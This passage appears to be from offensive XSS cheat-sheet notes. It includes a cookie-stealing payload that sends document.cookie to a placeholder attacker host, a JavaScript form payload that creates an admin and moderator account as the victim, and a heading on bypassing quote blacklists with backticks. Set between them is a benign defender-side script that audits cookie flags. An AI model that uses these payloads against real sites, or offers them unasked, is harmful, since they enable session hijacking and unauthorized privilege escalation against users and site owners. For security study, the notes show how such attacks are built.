Exploitation

Before trying to steal cookies, check that the HttpOnly flag is not set on them: a cookie marked HttpOnly is not exposed through document.cookie, so the payload below will not see it.

<img src onerror=window.location.replace("http://[IP]:[PORT]/a"+document.cookie);>
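As an added defender-side check (not part of the original notes), the snippet below audits the Set-Cookie header values an application emits for the HttpOnly flag the note above depends on, and reports Secure and SameSite in the same pass. The header values are constructed samples, not captured from any real application.

```javascript
// Added example, not from the original notes: audit Set-Cookie header values
// for the flags that decide whether injected script can read a cookie.
// A cookie without HttpOnly is exposed through document.cookie.

// Parse one Set-Cookie header value into { name, value, attrs }.
// Attribute names are case-insensitive (RFC 6265), so they are lower-cased;
// valueless attributes such as HttpOnly are stored as true.
function parseSetCookie(header) {
  var parts = header.split(";").map(function (p) { return p.trim(); });
  var pair = parts.shift();
  var eq = pair.indexOf("=");
  var cookie = {
    name: eq === -1 ? pair : pair.slice(0, eq),
    value: eq === -1 ? "" : pair.slice(eq + 1),
    attrs: {}
  };
  parts.forEach(function (attr) {
    if (!attr) return;
    var i = attr.indexOf("=");
    var key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    cookie.attrs[key] = i === -1 ? true : attr.slice(i + 1);
  });
  return cookie;
}

// Return one finding per cookie that lacks any of the three protections.
// HttpOnly blocks document.cookie access; Secure and SameSite are reported
// because a session-cookie review should cover them in the same pass.
function auditCookies(headers) {
  var findings = [];
  headers.forEach(function (h) {
    var c = parseSetCookie(h);
    var missing = [];
    if (!c.attrs.httponly) missing.push("HttpOnly");
    if (!c.attrs.secure) missing.push("Secure");
    if (!c.attrs.samesite) missing.push("SameSite");
    if (missing.length) findings.push({ name: c.name, missing: missing });
  });
  return findings;
}

// Constructed sample headers (not captured from any real application).
var SAMPLE_HEADERS = [
  "session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax",
  "PHPSESSID=def456; Path=/",
  "theme=dark; Path=/; Secure"
];

console.log(JSON.stringify(auditCookies(SAMPLE_HEADERS), null, 2));
```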

Execute an action with JavaScript

Whenever you want to perform some action as another user through XSS, you can take the payload below and adapt it to your needs.

var form = document.createElement("form");
form.method = "POST";
form.action = "http://[URL]:PORT/admin/users/create";

["name", "email", "isAdmin", "isMod"].forEach(function (key) {
  var input = document.createElement("input");
  input.type = "hidden";
  input.name = key;
  input.value = {
    name: "exploit",
    email: "aa",
    isAdmin: "True",
    isMod: "True"
  }[key];
  form.appendChild(input);
});

document.body.appendChild(form);
form.submit();

Version without ' or "

Sometimes certain characters are blacklisted; in the example below we successfully bypassed the blacklisting using backticks:
